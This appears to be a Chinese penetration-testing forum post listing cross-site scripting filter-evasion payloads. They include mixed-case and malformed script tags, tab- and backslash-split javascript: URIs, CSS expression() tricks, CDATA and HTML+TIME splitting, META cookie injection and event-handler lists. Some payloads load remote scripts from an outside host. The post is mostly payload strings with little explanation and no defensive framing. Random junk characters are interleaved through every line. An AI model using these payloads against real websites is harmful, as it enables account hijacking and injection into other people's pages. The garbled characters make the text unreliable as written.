中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写4 d4 d. k, O, ^. @+ L
8 w- g7 A  t6 _5 J6 ~

4 G# B( {1 p7 N! C8 K! ]) U
' r1 D+ d& @' P, Q- N2 s7 N5 Q    <sCript>alert(‘d’)</scRipT>. S8 p1 l9 S7 L. f  L2 ]. |

* q4 X6 Y# z' t$ ]2. 利用多加一些其它字符来规避Regular Expression的检查; N9 O+ D; O4 @6 w

. [; U1 {* H% w7 x+ Y4 r4 j    <<script>alert(‘c’)//<</script>, X1 |8 S9 ?- p
9 X0 Y2 b/ Y) p! I( W; Y6 s
    <SCRIPT a=">" SRC="t.js"></SCRIPT>
3 S2 x3 ^& L5 T3 R) x% l' n
$ J) g  T* r8 y    <SCRIPT =">" SRC="t.js"></SCRIPT>
6 Q; |( n- g4 D6 h' _5 S: d2 ]
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
; y+ m8 \' F8 \! z" y9 K& @( Q. |$ _% Q- ?6 P' `7 b
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
" K# c% Y/ K; m0 o: o+ o7 f0 F: m4 Q. _5 G. a! D' T
    <SCRIPT a=`>` SRC="t.js"></SCRIPT>5 q# k- S/ b# h$ [

" \0 Z7 k2 i8 [! @* k) Z, r    <SCRIPT a=">’>" SRC="t.js"></SCRIPT># d! [0 ?" M9 L) ?* w; S* B  h

. y% s, F- ^. f* \( ^3. 以其它扩展名取代.js
# [6 t# O4 O$ w- T2 t7 d/ Q0 {6 [. ~, _. s, x* x/ I% I
    <script src="bad.jpg"></script>7 S1 u' U/ C0 M' s. M

: k* P8 @# H& H2 m/ E, e  x4. 将Javascript写在CSS档里3 k  r$ [6 T8 s& v
1 G& f1 \0 z+ D# v. h
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
0 d- G0 V9 [8 M8 N& n' U* K1 }
! c$ B# h" q& {, G: M) S       example:
1 M) t9 f7 _! ^4 Q
0 t7 K$ U- |8 J2 u! h! }          body {) I, D3 v- r9 Y+ g# D+ N" Y, P

2 d. E; S) Q$ [2 p. B               background-image: url(‘javascript:alert("XSS");’)  m3 p5 K; N) _: O$ W
7 r5 ^1 G" y/ L8 B
          }) p( w- s7 g2 f9 t' [, N
7 u1 G) E( X+ Y1 c, b- ~
5. 在script的tag里加入一些其它字符
  U) c/ n: N( S5 q4 t8 z" d2 @$ ?8 G
    <SCRIPT/SRC="t.js"></SCRIPT>
' c6 z( |6 E3 T: z9 [1 f8 a& T3 v3 I& @
    <SCRIPT/anyword SRC="t.js"></SCRIPT>& e1 a$ e# Y+ O+ ^. d9 C$ e
1 O. J- _# N$ f. ]% z; e. b- c
6. 使用tab或是new line来规避
; q  d2 t6 L4 a1 q3 ]( p+ ?& `0 k  z- Y" ?# b
    <img src="jav ascr ipt:alert(‘XSS3′)">
3 Y! U& _. V! D) D& h
5 D" z, G+ K# r& ?. e    <img src="jav ascr ipt:alert(‘XSS3′)">" _$ e- F; {/ \8 A

$ r/ x) ]; b9 z1 C& ~1 b    <IMG SRC="jav ascript:alert(‘XSS’);">, n0 A9 c5 R/ z9 [1 `3 y
, J9 O# d; [4 k. u$ X7 _# N
         -> tag0 }8 B7 J0 |/ K" {

6 w: Y. R  f) w         -> new line
+ z4 u9 @& s$ [8 Y2 }+ I+ g
# L) b& c% y( h9 t# i7 O7. 使用"\"来规避2 y5 g' q$ f. {& t, m, @

; T0 E& Y+ b' s0 {2 M    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
* N2 y, }2 l! a3 D* m; _
- l0 N5 J" c4 k3 U; K    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
. H9 l+ v0 h; F- S- ]9 a9 `8 H( _$ Q, q2 ^
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
4 V# }+ |' X  M. ~6 u; o9 K5 s) [" W
3 I8 c8 K* T3 b: @    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 E& Y+ w; }% I
4 f# i$ x: E0 g, X: l8 [  D2 X    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
: q! @* h5 o: T; U$ w/ d( `- [2 l2 Z
8. 使用Hex encode来规避(也可能会把";"拿掉)
3 ]3 Z3 ^: v' I* r' U! ~/ h* R
" A  c$ \# B5 Y# n& c    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
5 D% f/ B% H6 Z" S" b
0 n2 R- q4 B8 s4 [+ D, C. Y( u        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">  @+ z( j: [# ]
3 k- L& M2 A- Z4 y4 n( A  j
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
; v* u) {8 }5 M, @9 r( R
& q8 c: ]- b5 Z2 l" C" K        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
4 i9 e  i. h4 l- ^! `- E& d' E- [! |+ Z: R8 T  E3 N
9. script in HTML tag3 p/ T" J9 B% `& Z2 c

% o. w9 g: A( k! D5 D# U    <body onload=」alert(‘onload’)」>
0 Q3 G' X' a# Q( i/ O( _% t; a. j5 a& Z1 K8 V
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
: D6 u' o+ S' N' `* `6 z+ D# ^2 ?0 E. d$ Y" T
10. 在swf里含有xss的code  d8 K; ?4 @- M1 e

# f8 u/ i5 Q. Z" i% k% R1 S7 H    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>% E) ?* f& G& c
0 I6 }3 n0 f) ?3 x1 ~" ^. A$ G
11. 利用CDATA将xss的code拆开,再组合起来。4 x& _( f' b: q& v0 p5 S. {: v
0 H7 P& N9 ]5 K7 P1 J& |: e8 ~
    <XML ID=I><X><C>
0 z$ [1 a# |6 H
0 I+ ^% P& c' A5 i% `) ~8 q    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>5 A  g! r# Z4 j; b+ }! Q
  A1 L. z8 L) T7 D& p) Y# H' q
    </C></X>5 Z, d2 k, ~# l4 o

3 Y7 f! a. \, L/ ]6 @6 j+ \* O    </xml>9 E* o1 c% M4 `6 L: x
" X" t6 q+ v3 w
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>! Q) ?  L3 F$ v8 G- S: v( j
* S. b5 T  _0 Z# o' K3 o7 \; ]
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
9 @2 T! ]; O0 x- E' ?, N/ _' V% ?  L( T1 [8 D8 ^5 _& m7 J4 [
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# V) x" n4 U* J' V
) }6 Q5 b5 l. X6 G: ~, v12. 利用HTML+TIME。. v0 ?3 w/ f# |2 M; u2 k2 S: l

1 v* S, c4 W  J4 }7 v    <HTML><BODY>6 [2 V" T: q+ p& A6 Q
* X  U. t  ]  L$ z- p
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
2 |8 b/ X" U9 i# p6 k
) h8 Q4 j- G- [6 d    <?import namespace="t" implementation="#default#time2">
) O+ U2 B* V  p- v" P, ]& S# O" X% f* W- o- j* p
    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
( G: H4 V$ q* c( m
$ {$ m& T- @* Z, l1 Z1 m    </BODY></HTML>) u/ d# S3 A( X# u

9 K; Z5 Q7 y, `) `1 T13. 透过META写入Cookie。
9 x, ]& A  e1 m3 ^5 R0 B, Q- y+ V: T1 _* Q# r$ S/ b. G" \
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
2 j. C0 P/ ?2 z/ x* |8 B
: }$ P+ I/ A; c7 ^14. javascript in src , href , url0 p5 M7 H( s7 s$ X* f, ]) H1 R; A
, n- R1 O0 e3 s
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>/ Y1 L" Z6 M6 D( z4 y+ ~
6 g/ ^0 Y+ |3 B# \( A
    <img src="javascript:alert(‘XSS3′)">/ D) [3 Z9 a8 {. X7 Y8 Y* a. k
; Y2 |: c4 `: q7 F" t8 n/ T+ c
<IMG DYNSRC="javascript:alert(‘XSS20′)">
6 e# Y* z+ m' |6 N* j) v6 u% t$ j2 N- c' c3 F9 V5 ?7 q
    <IMG LOWSRC="javascript:alert(‘XSS21′)">  L0 y$ M( W/ W
5 P9 u2 l; v9 a+ U) \7 F
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
2 j. ]  X0 v" }, e' ^
/ Y: s3 ?) J2 y$ g    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
5 r' _6 J' v3 C0 n$ G; c8 m: P  g, m
/ W/ V+ d- N# e( c( M& Z    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
5 t- W" p5 A6 b/ X
+ F; ]( S9 t' y1 Z    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">" H5 P7 V; D. z8 u9 Y

+ I5 B6 T6 a2 }1 u  V) s+ Q9 p0 K8 w    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
1 w8 p0 Y8 A+ V4 q4 ?' ^
$ J4 u% r3 w; x    </STYLE><A CLASS=XSS></A>- D' _4 _8 m8 C; I- X7 m% C5 q

+ E) R( K6 A* P) Q+ o    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
: J3 n5 j( h% k3 R2 n8 p4 A
4 W3 e9 \& K7 T/ k



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2